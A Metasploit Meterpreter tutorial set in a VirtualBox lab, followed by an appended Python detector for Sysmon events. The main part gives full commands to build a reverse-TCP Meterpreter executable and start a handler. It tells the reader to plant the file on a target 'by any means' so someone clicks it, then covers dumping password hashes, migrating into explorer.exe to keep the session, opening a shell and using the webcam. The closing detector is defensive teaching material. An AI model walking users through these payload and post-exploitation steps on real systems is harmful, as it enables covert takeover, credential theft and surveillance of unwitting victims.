
Metasploit Meterpreter

Meterpreter is a custom Metasploit payload that is delivered once a vulnerability has been exploited. It is an extension of the Metasploit Framework that broadens Metasploit’s functionality and lets us compromise the target further.


Some of its functionality includes ways to cover your tracks, reside purely in memory, dump hashes, access operating systems, pivot, and much more. Let’s again try to get access to a Windows system, as in the previous exercise, by making an executable (exe) file in Metasploit, but this time using a Meterpreter payload, as follows. You can use this payload with a regular bind TCP connection too.


Deliverable:

Lab Set up

  • Virtualization using Oracle Virtual box

  • Attacker’s System: Kali Linux

  • Target System : Windows 7

In Kali Linux --> Terminal

1. To create an executable (exe) file.

~# msfpayload windows/meterpreter/reverse_tcp LHOST=[IP address of Attacker System] LPORT=1337 X > /root/Desktop/[newfilename.exe] (Enter)

Here, LHOST --> Local Host, i.e. the Attacker System

LPORT --> Local Port for listening

X --> to stop or terminate command

/root/Desktop --> path or directory to store new exe file

It will create an executable (exe) file on the desktop in Kali Linux.

2. Start msfconsole

~# msfconsole (Enter)

3. Create a handler to handle the connection from the target.

> use exploit/multi/handler (Enter)

4. Set the same payload that was set when making the executable (exe) file.

> set payload windows/meterpreter/reverse_tcp (Enter)

> show options (Enter)

5. Set the local host IP address.

> set LHOST [IP address of Attacker System] (Enter)

6. Set the local listening port that was set when making the executable (exe) file.

> set LPORT 1337 (Enter)

7. Now exploit.

> exploit (Enter)

8. Meanwhile, plant this exe file on the target Windows 7 system by any means.

9. When somebody clicks on that exe (planted on the Windows 7 system), a reverse TCP connection is made from the target Windows 7 system to the attacker’s Kali Linux system, and you get a Meterpreter shell. Now you can run commands that are not possible with payloads other than Meterpreter.


10. For example, a screenshot of the target system’s current screen can be taken.

> screenshot (Enter)

11. For example, information about the target can be found.

> sysinfo (Enter)

12. For example, running processes can be listed, and you can kill or migrate to any process.

> ps (Enter)

Or

> kill [PID of the process to be killed]

Or

> migrate [PID of the process used for migration] (Enter)

Note that Meterpreter allows the user to migrate the session into another process. At this point the attacker should migrate into a process that has ‘system’ authority and is not usually killed by the target system’s user, such as the ‘explorer.exe’ process. Once this is done, there is little chance of losing the Meterpreter shell connection to the target system.


13. For example, the target system’s password hashes can be dumped.

> hashdump (Enter)

14. For example, getting a command prompt on the target Windows system.

> shell (Enter)

15. Many more commands can be used in the Meterpreter shell, such as upload, download, edit and execute a file, or use the target system’s webcam.
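Seen from the defender’s side, the sequence in steps 8 to 12 (a planted exe calls back to an uncommon port, then the session migrates into another process) leaves a pattern a host sensor can correlate. The following is an added example, not part of the original lab or of Metasploit: it runs over constructed Sysmon-style network-connect and remote-thread events (all paths, PIDs and addresses are invented) and assumes that a migrate shows up as a CreateRemoteThread from the payload process into its chosen target.

```python
"""Flag the reverse-TCP-then-migrate pattern in Sysmon-style events (added example)."""

# Constructed sample events shaped like Sysmon EventID 3 (NetworkConnect) and
# EventID 8 (CreateRemoteThread). Every path, PID and address here is invented.
SAMPLE_EVENTS = [
    {"id": 3, "pid": 4120, "image": r"C:\Users\bob\Desktop\invoice.exe",
     "dst_ip": "10.0.0.5", "dst_port": 1337},
    {"id": 3, "pid": 2200, "image": r"C:\Program Files\Firefox\firefox.exe",
     "dst_ip": "93.184.216.34", "dst_port": 443},
    {"id": 8, "src_pid": 4120, "src_image": r"C:\Users\bob\Desktop\invoice.exe",
     "tgt_pid": 1488, "tgt_image": r"C:\Windows\explorer.exe"},
    {"id": 8, "src_pid": 900, "src_image": r"C:\Windows\System32\csrss.exe",
     "tgt_pid": 1200, "tgt_image": r"C:\Windows\System32\svchost.exe"},
]

# A binary launched from a user-writable directory that immediately calls out
# on an uncommon port is the footprint of the planted exe in the lab above.
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\")
COMMON_PORTS = {80, 443, 53}

def from_user_writable(image):
    """True if the image path lies under a user-writable location (case-insensitive)."""
    return any(marker in image.lower() for marker in USER_WRITABLE)

def suspicious_connects(events):
    """Map pid -> EventID 3 record for user-writable binaries hitting uncommon ports."""
    return {ev["pid"]: ev for ev in events
            if ev["id"] == 3 and ev["dst_port"] not in COMMON_PORTS
            and from_user_writable(ev["image"])}

def find_migrations(events):
    """Pair a suspicious connect with a later remote-thread creation by the same pid.
    Assumption (as stated in the lead-in): a Meterpreter 'migrate' appears to Sysmon
    as EventID 8 from the payload process into the chosen target process."""
    callbacks = suspicious_connects(events)
    alerts = []
    for ev in events:
        if ev["id"] == 8 and ev["src_pid"] in callbacks:
            cb = callbacks[ev["src_pid"]]
            alerts.append({"pid": ev["src_pid"], "image": ev["src_image"],
                           "dst_ip": cb["dst_ip"], "dst_port": cb["dst_port"],
                           "target_pid": ev["tgt_pid"], "target_image": ev["tgt_image"]})
    return alerts

if __name__ == "__main__":
    for a in find_migrations(SAMPLE_EVENTS):
        print(f'{a["image"]} (pid {a["pid"]}) -> {a["dst_ip"]}:{a["dst_port"]}, '
              f'then injected into {a["target_image"]} (pid {a["target_pid"]})')
```

The Firefox connection and the csrss.exe remote thread are left alone; only the chain of callback plus injection from the same process produces an alert, which keeps the rule quiet on ordinary desktop activity.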

